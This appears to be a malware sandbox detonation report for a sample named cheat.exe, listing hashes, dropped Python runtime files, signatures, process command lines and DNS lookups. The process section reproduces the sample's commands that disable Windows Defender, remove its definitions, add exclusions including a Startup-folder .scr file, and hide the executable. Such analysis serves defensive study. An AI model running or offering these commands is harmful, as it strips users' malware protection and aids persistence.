| MD5 | 2ace16d4e52930f4d6ba779f05b23cd6 |
| SHA1 | 93e0eacaa99fc4e2d7c0459b46c93eef6148ca23 |
| SHA256 | 33f4a118404aa3aac4e4e9f81dcabd478dd65583df6db93bb9f110a3094c6e09 |
| SHA512 | b257654f5f9a783f48faa4cb9c1c71d6bb5ec6feb536063f9a59e5eb68f04c1e257da7703b18feb9011cf3e480426a4cad591ba0e788c59bb18a9bb71b45cdfe |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 92506923b2b85eba1aae6e78358818a4 |
| SHA1 | 526c7464b94d7b480c8cafd6a913c0d588efc94e |
| SHA256 | b608f005e3a7853e8bd02cb269db370829bfbdd25f4af39f714c77ee3a9f1b92 |
| SHA512 | 2d4a7c46b9df1d79153104ac8c8ec83612289844a2cdca30d9d22230dbba7996fbc367caf55b585a72c2387dedb283f735ab4ef66c7ca2a2e2fd68be7b8cf159 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 12a60a70d257bfd1434633641962f13b |
| SHA1 | e1b3bd14d550deb12ffdfb3de8da7f68470a6dae |
| SHA256 | d42d31ae68f23fe726f3dae6c276b814cc88ad2ef4d55017db1003bac3b4efaf |
| SHA512 | 184e7c044ed718a0edc3804060da24241e860e2770243ca3584a7682b452932a1b11556fd465ff825f0d0a3ec0c5e595d9ecd3f3484a64f8500bffc07a2f1b43 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 30ea014e9969f523b9d3422a7c10e0ce |
| SHA1 | 1ba5b6d76bc7e2b9e7f266eff429cb240c0928e4 |
| SHA256 | 8f1c0a72cc43c74ce36c6450a3f5f56d977c9af926cbba8664677fa8bb8a0390 |
| SHA512 | 4c45f0cf5f67087259ec06df068f382e11ce69017f0dd28a1d215bd2a81008e86413f211d196d3f37e954b591d7d8a02d5d91200ecb04b06ad9e4a66bb85c271 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\f7977567-4a8c-48ea-9772-54ff4ded2e92.tmp
| MD5 | 5330b27eff8bf79edbd436d65aa481cb |
| SHA1 | e00a960ba1b799a6d48b0258a922f0614e9b121f |
| SHA256 | 58b615dceaea0b8c6359e6d8f0f456b71aab810cc2b1ad84433707c0f6919886 |
| SHA512 | 9c0238afce019cc323808c68d2e3a148cf7332f3fd502dbeaa8b05362cabf18adcf1af41f2f68c17f7637673511b02b12b9ac00cafb65710653fb9634ed5296a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 7b908b49d5363f7598d52b84c5715836 |
| SHA1 | d88294b45f6cff437435fd3330983ab7addff869 |
| SHA256 | 33bb63cda399e6505685e793f14c8d0b37b7c2ff964f20ee5394bfaa181b05d2 |
| SHA512 | 7066d1ec48251332194dfb86f9e2e1dd87998641b20ec146147abaca6cf33e24f20b5bdd37a56f3d17a4aa3d52eee322e0590689fcebb9dc9894635fa0d54121 |
memory/704-809-0x0000000002E10000-0x0000000002E11000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-19 14:53
Reported
2024-06-19 14:56
Platform
win10v2004-20240508-en
Max time kernel
149s
Max time network
149s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Loads dropped DLL
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Hide Artifacts: Hidden Files and Directories
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133632825322412026" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\release\main\cheat.exe
"C:\Users\Admin\AppData\Local\Temp\release\main\cheat.exe"
C:\Users\Admin\AppData\Local\Temp\release\main\cheat.exe
"C:\Users\Admin\AppData\Local\Temp\release\main\cheat.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\release\main\cheat.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\release\main\cheat.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\release\main\cheat.exe""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Temp\release\main\cheat.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe884cab58,0x7ffe884cab68,0x7ffe884cab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1736 --field-trial-handle=1968,i,7897650364813518354,5614495541487977988,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1968,i,7897650364813518354,5614495541487977988,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2292 --field-trial-handle=1968,i,7897650364813518354,5614495541487977988,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3084 --field-trial-handle=1968,i,7897650364813518354,5614495541487977988,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3092 --field-trial-handle=1968,i,7897650364813518354,5614495541487977988,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4372 --field-trial-handle=1968,i,7897650364813518354,5614495541487977988,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4800 --field-trial-handle=1968,i,7897650364813518354,5614495541487977988,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4352 --field-trial-handle=1968,i,7897650364813518354,5614495541487977988,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4768 --field-trial-handle=1968,i,7897650364813518354,5614495541487977988,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4880 --field-trial-handle=1968,i,7897650364813518354,5614495541487977988,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4232 --field-trial-handle=1968,i,7897650364813518354,5614495541487977988,131072 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blank-7eyjy.in | udp |
| US | 8.8.8.8:53 | blank-7eyjy.in | udp |
| US | 8.8.8.8:53 | blank-7eyjy.in | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI20642\python311.dll
| MD5 | 5f6fd64ec2d7d73ae49c34dd12cedb23 |
| SHA1 | c6e0385a868f3153a6e8879527749db52dce4125 |
| SHA256 | ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967 |
| SHA512 | c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab |
C:\Users\Admin\AppData\Local\Temp\_MEI20642\VCRUNTIME140.dll
| MD5 | 49c96cecda5c6c660a107d378fdfc3d4 |
| SHA1 | 00149b7a66723e3f0310f139489fe172f818ca8e |
| SHA256 | 69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc |
| SHA512 | e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d |
memory/4004-25-0x00007FFE89C50000-0x00007FFE8A239000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI20642\base_library.zip
| MD5 | 32ede00817b1d74ce945dcd1e8505ad0 |
| SHA1 | 51b5390db339feeed89bffca925896aff49c63fb |
| SHA256 | 4a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a |
| SHA512 | a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7 |
C:\Users\Admin\AppData\Local\Temp\_MEI20642\_ssl.pyd
| MD5 | f9cc7385b4617df1ddf030f594f37323 |
| SHA1 | ebceec12e43bee669f586919a928a1fd93e23a97 |
| SHA256 | b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6 |
| SHA512 | 3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb |
memory/4004-48-0x00007FFEA1020000-0x00007FFEA102F000-memory.dmp
memory/4004-47-0x00007FFE98D20000-0x00007FFE98D43000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI20642\_sqlite3.pyd
| MD5 | 1a8fdc36f7138edcc84ee506c5ec9b92 |
| SHA1 | e5e2da357fe50a0927300e05c26a75267429db28 |
| SHA256 | 8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882 |
| SHA512 | 462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0 |
C:\Users\Admin\AppData\Local\Temp\_MEI20642\_socket.pyd
| MD5 | 1a34253aa7c77f9534561dc66ac5cf49 |
| SHA1 | fcd5e952f8038a16da6c3092183188d997e32fb9 |
| SHA256 | dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f |
| SHA512 | ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a |
C:\Users\Admin\AppData\Local\Temp\_MEI20642\_queue.pyd
| MD5 | 347d6a8c2d48003301032546c140c145 |
| SHA1 | 1a3eb60ad4f3da882a3fd1e4248662f21bd34193 |
| SHA256 | e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192 |
| SHA512 | b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06 |
C:\Users\Admin\AppData\Local\Temp\_MEI20642\_lzma.pyd
| MD5 | 542eab18252d569c8abef7c58d303547 |
| SHA1 | 05eff580466553f4687ae43acba8db3757c08151 |
| SHA256 | d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9 |
| SHA512 | b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958 |
C:\Users\Admin\AppData\Local\Temp\_MEI20642\_hashlib.pyd
| MD5 | b227bf5d9fec25e2b36d416ccd943ca3 |
| SHA1 | 4fae06f24a1b61e6594747ec934cbf06e7ec3773 |
| SHA256 | d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7 |
| SHA512 | c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e |
C:\Users\Admin\AppData\Local\Temp\_MEI20642\_decimal.pyd
| MD5 | e3fb8bf23d857b1eb860923ccc47baa5 |
| SHA1 | 46e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0 |
| SHA256 | 7da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3 |
| SHA512 | 7b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c |
C:\Users\Admin\AppData\Local\Temp\_MEI20642\_bz2.pyd
| MD5 | c413931b63def8c71374d7826fbf3ab4 |
| SHA1 | 8b93087be080734db3399dc415cc5c875de857e2 |
| SHA256 | 17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293 |
| SHA512 | 7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f |
C:\Users\Admin\AppData\Local\Temp\_MEI20642\unicodedata.pyd
| MD5 | 8c42fcc013a1820f82667188e77be22d |
| SHA1 | fba7e4e0f86619aaf2868cedd72149e56a5a87d4 |
| SHA256 | 0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2 |
| SHA512 | 3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4 |
C:\Users\Admin\AppData\Local\Temp\_MEI20642\sqlite3.dll
| MD5 | dbc64142944210671cca9d449dab62e6 |
| SHA1 | a2a2098b04b1205ba221244be43b88d90688334c |
| SHA256 | 6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c |
